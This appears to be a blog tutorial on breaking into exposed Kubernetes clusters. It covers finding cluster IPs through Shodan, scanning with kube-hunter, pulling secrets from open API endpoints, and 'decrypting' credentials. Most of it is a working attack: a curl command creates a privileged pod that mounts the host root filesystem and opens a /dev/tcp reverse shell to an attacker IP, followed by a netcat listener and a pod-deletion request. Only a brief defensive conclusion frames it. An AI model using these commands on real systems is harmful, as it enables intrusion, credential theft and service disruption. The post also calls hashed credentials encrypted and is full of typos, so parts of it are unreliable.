Ways to get into the Kubernetes cluster —Part 1
Overview:
This article gives you an extensive view of how to gain access to the Kubernetes cluster.
Inroduction
One effective way to grasp the importance of Kubernetes security is by exploring a vulnerable API endpoint scenario. An API endpoint serves as a gateway for communication between different components of a system. When insecurely configured or exploited, it can become a potential entry point for attackers.
How do I identify a Kubernetes Clusters IP?
You found an IP address, and now you need to verify that it is Kubernetes Clusters IP.
Use shodan.io or search.censys.io to verify.
Have you found the Kubernetes Cluser IP?
Yes.
Now we need to find the open ports like 80, 443, 8080, 8001, 6443, 8009.
Open all ports and check if any port has a vulnerable API endpoint.
It should look like this.
Kube-hunter
Use Kuber-hunter to scan the vulnerabilities in the Kubernetes cluster.
https://github.com/aquasecurity/kube-hunter
If the UI dashboard is open now, you can view all the namespaces and pods running, create and delete pods, exec to pods, and see the secret data in pods. It will give you the RABC roles and more.
Now What?
Now you have full access to read the cluster services like namespaces, pods, secerts, services, tokens, login credentials for databases, and many more.
You can use the Fuzz List to access the data.
First, find the UI end point and check whether it is open.
<ip>:8001/api/v1/namespaces/kubernetes-dashboard/services/kubernetes-dashboard/proxy
What if the UI is not available?
Now first, go to secrets and find the token: http://<ip>:8080/api/v1/secrets
Grab the secret and store it.
Now check out all the secrets here. You may find a database, username, password, and hostname in encrypted form. Copy them, and use https://hashes.com/en/tools/hash_identifier to decrypt them.
Create a pod using this vulnerability.
First, we need to create a pod inside this cluster.
curl -k -X POST -H 'Content-Type: application/yaml' \
-H "Authorization: Bearer <JWT_TOKEN>" --data '
apiVersion: v1
kind: Pod
metadata:
name: alpine
spec:
containers:
- name: alpine
image: ubuntu
command: ['/bin/bash', '-c', 'sh -i >& /dev/tcp/<Reverse shell IP>/12345 0>&1']
volumeMounts:
- mountPath: /demo/
name: mount-demo-into-mnt
volumes:
- name: mount-demo-into-mnt
hostPath:
path: /
automountServiceAccountToken: true
hostNetwork: true' "https://<ip>/api/v1/namespaces/default/pods"Use this curl command and add the IP address to receive a revershell, and add the cluster IP address at the bottom.
Open a netcat port in your machine using ncat -lp 12345
Now you can directly hit this using CLI or Postman.
Now pod has been pushed to cluster and is waiting to get initialized.
You can verify the status of the pod at this end point.
https://<ip>:8080/api/v1/namespaces/default/pods
After pod starts, you can type the ls command in your terminal to check if reverse shell is enabled.
Hurry, You have successfully established a connection to pod.
Now you are all set to get inside the Kubernetes cluster.
How do I delete pods?
curl http://<ip>:8080/api/v1/namespaces/default/pods/nginx1 \
-X DELETE -k \
-H "Authorization: Bearer <Token>"If you add the same token and send it through CLI or Postman, the pod will be deleted. Here, change the pod name that you want to delete at the end.
/api/v1/namespaces/default/pods/<pod name>
Verify that the pod was deleted.
Conclusion:
The vulnerability of Kubernetes API endpoints poses a significant risk to the overall security of containerized environments. As organizations increasingly adopt Kubernetes for container orchestration, it becomes imperative to address and mitigate potential weaknesses in API security. The exposure of vulnerable API endpoints can lead to a range of security threats, including unauthorized access, data breaches, and service disruptions.
You can find Part 2 here:
https://manojdeshmukh45.medium.com/ways-to-get-into-the-kubernetes-cluster-part-2-b08b72ee5875
